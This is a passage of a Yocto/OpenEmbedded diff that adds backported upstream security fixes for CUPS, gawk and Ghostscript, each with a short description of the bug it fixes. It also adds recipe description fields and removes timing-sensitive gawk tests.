20@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */
21 b ++;
22 }
23
24- return (result);
25+ /*
26+ * The while loop finishes when *a == '\0' or *b == '\0'
27+ * so after the while loop either both *a and *b == '\0',
28+ * or one points inside a string, so when we apply logical OR on *a,
29+ * *b and result, we get a non-zero return value if the compared strings don't match.
30+ */
31+
32+ return (result | *a | *b);
33 }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
1From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
2From: Zdenek Dohnal <zdohnal@redhat.com>
3Date: Thu, 1 Jun 2023 12:04:00 +0200
4Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
5
6CVE: CVE-2023-32324
7Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
8
9(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
10Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
11---
12 cups/string.c | 4 ++++
13 1 file changed, 4 insertions(+)
14
15diff --git a/cups/string.c b/cups/string.c
16index 93cdad19..6ef58515 100644
17--- a/cups/string.c
18+++ b/cups/string.c
19@@ -1,6 +1,7 @@
20 /*
21 * String functions for CUPS.
22 *
23+ * Copyright © 2023 by OpenPrinting.
24 * Copyright © 2007-2019 by Apple Inc.
25 * Copyright © 1997-2007 by Easy Software Products.
26 *
27@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */
28 size_t srclen; /* Length of source string */
29
30
31+ if (size == 0)
32+ return (0);
33+
34 /*
35 * Figure out how much room is needed...
36 */
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
1From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
2From: Michael R Sweet <michael.r.sweet@gmail.com>
3Date: Tue, 6 Dec 2022 09:04:01 -0500
4Subject: [PATCH] Require authentication for CUPS-Get-Document.
5
6Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
7CVE: CVE-2023-32360
8Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
9---
10 conf/cupsd.conf.in | 8 +++++++-
11 1 file changed, 7 insertions(+), 1 deletion(-)
12
13diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
14index b258849078..a07536f3e4 100644
15--- a/conf/cupsd.conf.in
16+++ b/conf/cupsd.conf.in
17@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
18 Order deny,allow
19 </Limit>
20
21- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
22+ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
23+ Require user @OWNER @SYSTEM
24+ Order deny,allow
25+ </Limit>
26+
27+ <Limit CUPS-Get-Document>
28+ AuthType Default
29 Require user @OWNER @SYSTEM
30 Order deny,allow
31 </Limit>
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
1From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
2From: Rose <83477269+AtariDreams@users.noreply.github.com>
3Date: Thu, 1 Jun 2023 11:33:39 -0400
4Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
5
6httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
7
8We have to log the hostname first.
9
10Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
11CVE: CVE-2023-34241
12Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
13---
14 scheduler/client.c | 16 +++++++---------
15 1 file changed, 7 insertions(+), 9 deletions(-)
16
17diff --git a/scheduler/client.c b/scheduler/client.c
18index 91e441188c..327473a4d1 100644
19--- a/scheduler/client.c
20+++ b/scheduler/client.c
21@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
22 /*
23 * Can't have an unresolved IP address with double-lookups enabled...
24 */
25-
26- httpClose(con->http);
27-
28 cupsdLogClient(con, CUPSD_LOG_WARN,
29- "Name lookup failed - connection from %s closed!",
30+ "Name lookup failed - closing connection from %s!",
31 httpGetHostname(con->http, NULL, 0));
32
33+ httpClose(con->http);
34 free(con);
35 return;
36 }
37@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
38 * with double-lookups enabled...
39 */
40
41- httpClose(con->http);
42-
43 cupsdLogClient(con, CUPSD_LOG_WARN,
44- "IP lookup failed - connection from %s closed!",
45+ "IP lookup failed - closing connection from %s!",
46 httpGetHostname(con->http, NULL, 0));
47+
48+ httpClose(con->http);
49 free(con);
50 return;
51 }
52@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
53
54 if (!hosts_access(&wrap_req))
55 {
56- httpClose(con->http);
57-
58 cupsdLogClient(con, CUPSD_LOG_WARN,
59 "Connection from %s refused by /etc/hosts.allow and "
60 "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
61+
62+ httpClose(con->http);
63 free(con);
64 return;
65 }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
1From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
2From: Zdenek Dohnal <zdohnal@redhat.com>
3Date: Fri, 1 Sep 2023 16:47:29 +0200
4Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
5
6We didn't check for end of buffer if it looks there is an escaped
7character - check for NULL terminator there and if found, return NULL
8as return value and in `ptr`, because a lone backslash is not
9a valid PostScript character.
10
11Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
12CVE: CVE-2023-4504
13Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
14---
15 cups/raster-interpret.c | 14 +++++++++++++-
16 1 file changed, 13 insertions(+), 1 deletion(-)
17
18--- a/cups/raster-interpret.c
19+++ b/cups/raster-interpret.c
20@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S
21
22 cur ++;
23
24- if (*cur == 'b')
25+ /*
26+ * Return NULL if we reached NULL terminator, a lone backslash
27+ * is not a valid character in PostScript.
28+ */
29+
30+ if (!*cur)
31+ {
32+ *ptr = NULL;
33+
34+ return (NULL);
35+ }
36+
37+ if (*cur == 'b')
38 *valptr++ = '\b';
39 else if (*cur == 'f')
40 *valptr++ = '\f';
diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 02b016fdf1..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
1SUMMARY = "Collection of autoconf m4 macros" 1SUMMARY = "Collection of autoconf m4 macros"
2SECTION = "base" 2SECTION = "base"
3HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/" 3HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
4DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
6 7
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Line-oriented text editor" 1SUMMARY = "Line-oriented text editor"
2HOMEPAGE = "http://www.gnu.org/software/ed/" 2HOMEPAGE = "http://www.gnu.org/software/ed/"
3DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
3 4
4LICENSE = "GPLv3+" 5LICENSE = "GPLv3+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
1From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
2From: "Arnold D. Robbins" <arnold@skeeve.com>
3Date: Wed, 3 Aug 2022 13:00:54 +0300
4Subject: [PATCH] Smal bug fix in builtin.c.
5
6Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
7Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
8CVE: CVE-2023-4156
9Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
10---
11 ChangeLog | 6 ++++++
12 builtin.c | 5 ++++-
13 2 files changed, 10 insertions(+), 1 deletion(-)
14
15--- gawk-5.1.0.orig/builtin.c
16+++ gawk-5.1.0/builtin.c
17@@ -957,7 +957,10 @@ check_pos:
18 s1++;
19 n0--;
20 }
21- if (val >= num_args) {
22+ // val could be less than zero if someone provides a field width
23+ // so large that it causes integer overflow. Mainly fuzzers do this,
24+ // but let's try to be good anyway.
25+ if (val < 0 || val >= num_args) {
26 toofew = true;
27 break;
28 }
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
1These tests require an unloaded host as otherwise timing sensitive tests can fail
2https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
3
4Upstream-Status: Inappropriate
5Signed-off-by: Ross Burton <ross.burton@arm.com>
6
7--- a/test/Maketests~
8+++ b/test/Maketests
9@@ -2069,7 +2069,2 @@
10
11-timeout:
12- @echo $@ $(ZOS_FAIL)
13- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
14- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
15-
16 typedregex1:
17@@ -2297,7 +2292,2 @@
18 @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
19-
20-time:
21- @echo $@
22- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
23- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
24
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
16PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr" 16PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
17 17
18SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \ 18SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
19 file://remove-sensitive-tests.patch \
19 file://run-ptest \ 20 file://run-ptest \
21 file://CVE-2023-4156.patch \
20" 22"
21 23
22SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb" 24SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
41do_install_ptest() { 43do_install_ptest() {
42 mkdir ${D}${PTEST_PATH}/test 44 mkdir ${D}${PTEST_PATH}/test
43 ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk 45 ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
44 for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \ 46 # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
45 do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \ 47 TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
48 for i in $TESTS Maketests inclib.awk; do
49 cp ${S}/test/$i* ${D}${PTEST_PATH}/test
46 done 50 done
47 sed -i -e 's|/usr/local/bin|${bindir}|g' \ 51 sed -i -e 's|/usr/local/bin|${bindir}|g' \
48 -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk 52 -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
49 53
50 sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests 54 sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
55
56 # These tests require an unloaded host as otherwise timing sensitive tests can fail
57 # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
58 rm -f ${D}${PTEST_PATH}/test/time.*
59 rm -f ${D}${PTEST_PATH}/test/timeout.*
51} 60}
52 61
53RDEPENDS_${PN}-ptest += "make" 62RDEPENDS_${PN}-ptest += "make"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
1From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Mon, 17 Jul 2023 14:06:37 +0100
4Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
5 devices/gdevpcx.c
6
7Bounds check the buffer, before dereferencing the pointer.
8
9Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
10CVE: CVE-2023-38559
11Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
12---
13 base/gdevdevn.c | 2 +-
14 1 file changed, 1 insertion(+), 1 deletion(-)
15
16diff --git a/base/gdevdevn.c b/base/gdevdevn.c
17index 3b019d6..2888776 100644
18--- a/base/gdevdevn.c
19+++ b/base/gdevdevn.c
20@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
21 byte data = *from;
22
23 from += step;
24- if (data != *from || from == end) {
25+ if (from >= end || data != *from) {
26 if (data >= 0xc0)
27 gp_fputc(0xc1, file);
28 } else {
29--
302.25.1
31
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
1From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
2From: Ken Sharp <ken.sharp@artifex.com>
3Date: Wed, 20 May 2020 16:02:07 +0100
4Subject: [PATCH] txtwrite - address memory problems
5
6Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
7Also bug #702346 and the earlier report #701877.
8
9The problems occur because its possible for a single character code in
10a PDF file to map to more than a single Unicode code point. In the case
11of the file for 701877 the character code maps to 'f' and 'i' (it is an
12fi ligature).
13
14The code should deal with this, but we need to ensure we are using the
15correct index. In addition, if we do get more Unicode code points than
16we expected, we need to set the widths of the 'extra' code points to
17zero (we only want to consider the width of the original character).
18
19This does mean increasing the size of the Widths array to cater for
20the possibility of more entries on output than there were on input.
21
22While working on it I noticed that the Unicode remapping on little-
23endian machines was reversing the order of the Unicode values, when
24there was more than a single code point returned, so fixed that at
25the same time.
26
27Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
28CVE: CVE-2020-36773
29Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
30---
31 devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
32 1 file changed, 16 insertions(+), 10 deletions(-)
33
34diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
35index 87f9355..bddce5a 100644
36--- a/devices/vector/gdevtxtw.c
37+++ b/devices/vector/gdevtxtw.c
38@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
39 #else
40 b = (char *)Buffer;
41 u = (char *)unicode;
42- while (l >= 0) {
43- *b++ = *(u + l);
44- l--;
45- }
46
47+ for (l=0;l<length;l+=2, u+=2){
48+ *b++ = *(u+1);
49+ *b++ = *u;
50+ }
51 #endif
52 gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
53 return length / sizeof(short);
54@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
55 &penum->text_state->matrix, &wanted);
56 pte->returned.total_width.x += wanted.x;
57 pte->returned.total_width.y += wanted.y;
58- penum->Widths[pte->index - 1] = wanted.x;
59+ penum->Widths[penum->TextBufferIndex] = wanted.x;
60
61 if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
62 gs_point tpt;
63@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
64 pte->returned.total_width.x += dpt.x;
65 pte->returned.total_width.y += dpt.y;
66
67- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
68- penum->Widths[pte->index - 1] += dpt.x;
69+ penum->Widths[penum->TextBufferIndex] += dpt.x;
70+ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
71+ /* If a single text code returned multiple Unicode values, then we need to set the
72+ * 'extra' code points' widths to 0.
73+ */
74+ if (code > 1)
75+ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
76+ penum->TextBufferIndex += code;
77 }
78 return 0;
79 }
80@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
81 if (!penum->text_state->Widths)
82 return gs_note_error(gs_error_VMerror);
83 memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
84- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
85+ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
86
87 unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
88 penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
89@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
90 if (!unsorted_entry->Widths)
91 return gs_note_error(gs_error_VMerror);
92 memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
93- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
94+ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
95
96 unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
97 (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
98@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
99 if (!penum->TextBuffer)
100 return gs_note_error(gs_error_VMerror);
101 penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
102- pte->text.size, sizeof(float), "txtwrite temporary widths array");
103+ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
104 if (!penum->Widths)
105 return gs_note_error(gs_error_VMerror);
106 }
107--
1082.25.1
109
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
1From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Thu, 20 Aug 2020 17:19:09 +0100
4Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
5
6Firstly, in gx_device_delete_output_file the iodev pointer was being passed
7to the delete_method incorrectly (passing a pointer to that pointer). Thus
8when we attempted to use that to confirm permission to delete the file, it
9crashed. Credit to Ken for finding that.
10
11Secondly, due to the way pdfwrite works, when running with an output file per
12page, it creates the current output file immediately it has completed writing
13the previous one. Thus, it has to delete that partial file on exit.
14
15Previously, the output file was not added to the "control" permission list,
16so an attempt to delete it would result in an error. So add the output file
17to the "control" as well as "write" list.
18
19CVE: CVE-2021-3781
20
21Upstream-Status: Backport:
22https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
23
24Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
25---
26 base/gsdevice.c | 2 +-
27 base/gslibctx.c | 20 ++++++++++++++------
28 2 files changed, 15 insertions(+), 7 deletions(-)
29
30diff --git a/base/gsdevice.c b/base/gsdevice.c
31index 913119495..ac78af93f 100644
32--- a/base/gsdevice.c
33+++ b/base/gsdevice.c
34@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
35 parsed.len = strlen(parsed.fname);
36 }
37 if (parsed.iodev)
38- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
39+ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
40 else
41 code = gs_note_error(gs_error_invalidfileaccess);
42
43diff --git a/base/gslibctx.c b/base/gslibctx.c
44index d726c58b5..ff8fc895e 100644
45--- a/base/gslibctx.c
46+++ b/base/gslibctx.c
47@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
48 char *fp, f[gp_file_name_sizeof];
49 const int pipe = 124; /* ASCII code for '|' */
50 const int len = strlen(fname);
51- int i;
52+ int i, code;
53
54 /* Be sure the string copy will fit */
55 if (len >= gp_file_name_sizeof)
56@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
57 rewrite_percent_specifiers(f);
58 for (i = 0; i < len; i++) {
59 if (f[i] == pipe) {
60- int code;
61-
62 fp = &f[i + 1];
63 /* Because we potentially have to check file permissions at two levels
64 for the output file (gx_device_open_output_file and the low level
65@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
66 if (code < 0)
67 return code;
68 break;
69+ code = gs_add_control_path(mem, gs_permit_file_control, f);
70+ if (code < 0)
71+ return code;
72 }
73 if (!IS_WHITESPACE(f[i]))
74 break;
75 }
76+ code = gs_add_control_path(mem, gs_permit_file_control, fp);
77+ if (code < 0)
78+ return code;
79 return gs_add_control_path(mem, gs_permit_file_writing, fp);
80 }
81
82@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
83 char *fp, f[gp_file_name_sizeof];
84 const int pipe = 124; /* ASCII code for '|' */
85 const int len = strlen(fname);
86- int i;
87+ int i, code;
88
89 /* Be sure the string copy will fit */
90 if (len >= gp_file_name_sizeof)
91@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
92 /* Try to rewrite any %d (or similar) in the string */
93 for (i = 0; i < len; i++) {
94 if (f[i] == pipe) {
95- int code;
96-
97 fp = &f[i + 1];
98 /* Because we potentially have to check file permissions at two levels
99 for the output file (gx_device_open_output_file and the low level
100@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
101 the pipe_fopen(), the leading '|' has been stripped.
102 */
103 code = gs_remove_control_path(mem, gs_permit_file_writing, f);
104+ if (code < 0)
105+ return code;
106+ code = gs_remove_control_path(mem, gs_permit_file_control, f);
107 if (code < 0)
108 return code;
109 break;
110@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
111 if (!IS_WHITESPACE(f[i]))
112 break;
113 }
114+ code = gs_remove_control_path(mem, gs_permit_file_control, fp);
115+ if (code < 0)
116+ return code;
117 return gs_remove_control_path(mem, gs_permit_file_writing, fp);
118 }
119
120--
1212.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
1From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Mon, 24 Aug 2020 09:24:31 +0100
4Subject: [PATCH] Coverity 361429: move "break" to correct place.
5
6We had to add the outputfile to the "control" file permission list (as well
7as write), but for the "pipe" case, I accidentally added the call after the
8break out of loop that checks for a pipe.
9
10CVE: CVE-2021-3781
11
12Upstream-Status: Backport:
13https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
14
15Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
16---
17 base/gslibctx.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/base/gslibctx.c b/base/gslibctx.c
21index ff8fc895e..63dfbe2e0 100644
22--- a/base/gslibctx.c
23+++ b/base/gslibctx.c
24@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
25 code = gs_add_control_path(mem, gs_permit_file_writing, f);
26 if (code < 0)
27 return code;
28- break;
29 code = gs_add_control_path(mem, gs_permit_file_control, f);
30 if (code < 0)
31 return code;
32+ break;
33 }
34 if (!IS_WHITESPACE(f[i]))
35 break;
36--
372.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
new file mode 100644
index 0000000000..e3f9e81c45
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
1From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Tue, 7 Sep 2021 20:36:12 +0100
4Subject: [PATCH] Bug 704342: Include device specifier strings in access
5 validation
6
7for the "%pipe%", %handle%" and %printer% io devices.
8
9We previously validated only the part after the "%pipe%" Postscript device
10specifier, but this proved insufficient.
11
12This rebuilds the original file name string, and validates it complete. The
13slight complication for "%pipe%" is it can be reached implicitly using
14"|" so we have to check both prefixes.
15
16Addresses CVE-2021-3781
17
18CVE: CVE-2021-3781
19
20Upstream-Status: Backport:
21https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
22
23Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
24---
25 base/gdevpipe.c | 22 +++++++++++++++-
26 base/gp_mshdl.c | 11 +++++++-
27 base/gp_msprn.c | 10 ++++++-
